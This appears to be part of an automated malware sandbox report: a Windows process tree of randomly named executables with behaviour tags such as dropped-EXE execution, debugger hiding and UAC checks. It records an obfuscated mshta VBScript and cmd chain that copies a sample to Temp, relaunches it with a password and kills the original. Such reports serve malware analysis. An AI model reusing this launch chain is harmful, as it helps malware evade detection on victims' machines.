C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13308
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:2696
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12636
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10484 -s 284⤵
- Program crash
- Checks processor information in registry
PID:7752
-
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13084
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7020
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:9164
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9264
-
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:7680
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:428
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13112
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12940
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13544
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:14188
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13660
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:3272
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13728
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4400
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:14184
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7320
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:6964
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13924
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:5588
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12672
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12404
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11384
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12920
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵
- Enumerates system info in registry
PID:14068
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12224
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10832
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12204
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10420
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11756
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11520
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:10588
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11888
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11716
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11780
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:12112
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13504
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:4880
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:14672
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:15140
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:14620
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13432
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:8068
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13496
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:13560
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:14624
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:11536
-
-
C:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exeC:\Users\Admin\Documents\T1vR4WrDcDSogjCwBQvMGbKr.exe3⤵PID:15408
-
-
-
C:\Users\Admin\Documents\EKn_OVLBdja5sVWvxioG1V7M.exe"C:\Users\Admin\Documents\EKn_OVLBdja5sVWvxioG1V7M.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Users\Admin\Documents\hXs7V6wVyEQwn1KTElchP9EQ.exe"C:\Users\Admin\Documents\hXs7V6wVyEQwn1KTElchP9EQ.exe"2⤵
- Executes dropped EXE
PID:2052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 2723⤵
- Program crash
PID:2996
-
-
-
C:\Users\Admin\Documents\zQV5DgrHRg2FoIip1FWqVRwo.exe"C:\Users\Admin\Documents\zQV5DgrHRg2FoIip1FWqVRwo.exe"2⤵
- Executes dropped EXE
PID:2000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 2763⤵
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Users\Admin\Documents\sm9PYHfj18WU6helQ6bqJ_DZ.exe"C:\Users\Admin\Documents\sm9PYHfj18WU6helQ6bqJ_DZ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1896
-
-
C:\Users\Admin\Documents\vcgP_3juGzHeGgIt97Ec6H6N.exe"C:\Users\Admin\Documents\vcgP_3juGzHeGgIt97Ec6H6N.exe"2⤵
- Executes dropped EXE
PID:1872
-
-
C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe"C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe"2⤵
- Executes dropped EXE
PID:920 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )3⤵PID:840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\qYR4nzypVyFJN472kUDHVHqD.exe" ) do taskkill -F /Im "%~nXN"4⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG5⤵
- Executes dropped EXE
PID:5736 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )6⤵PID:4272
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"7⤵PID:5460
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p6⤵PID:5692
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "qYR4nzypVyFJN472kUDHVHqD.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6068
-
-
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe"C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2352 -
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5064
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
PID:5296
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
PID:2108
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
PID:828
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6296
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:3128
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6912
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
PID:1752
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:4848
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 284⤵
- Program crash
PID:7600
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:3680
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7656
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8072
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1108
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:3132
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6932
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8220
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8768
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8460
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:476
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9712
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9404
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9844
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7988
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1428
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:736
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8484
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:4880
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:2296
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8776
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5360
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6736
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1204
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:2940
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11136
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10292
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9856
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8700
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9368
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7792
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:2084
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9656
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11104
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9136
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10152
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 284⤵
- Program crash
PID:7684
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9824
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:11052
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10816 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4904
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8932
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:4952
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10928
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Checks processor information in registry
PID:10544
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:4284
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7036
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:1872
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5276
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:8672
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9916
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6196
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5052
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:8320
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:6480
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:3284
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:9836
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5544
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10656
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5604
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7812
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:7348
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:10160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10160 -s 284⤵
- Program crash
PID:5788
-
-
-
C:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exeC:\Users\Admin\Documents\7noQoxsVgLBBtgcZWelnZEHN.exe3⤵PID:5092
-
-
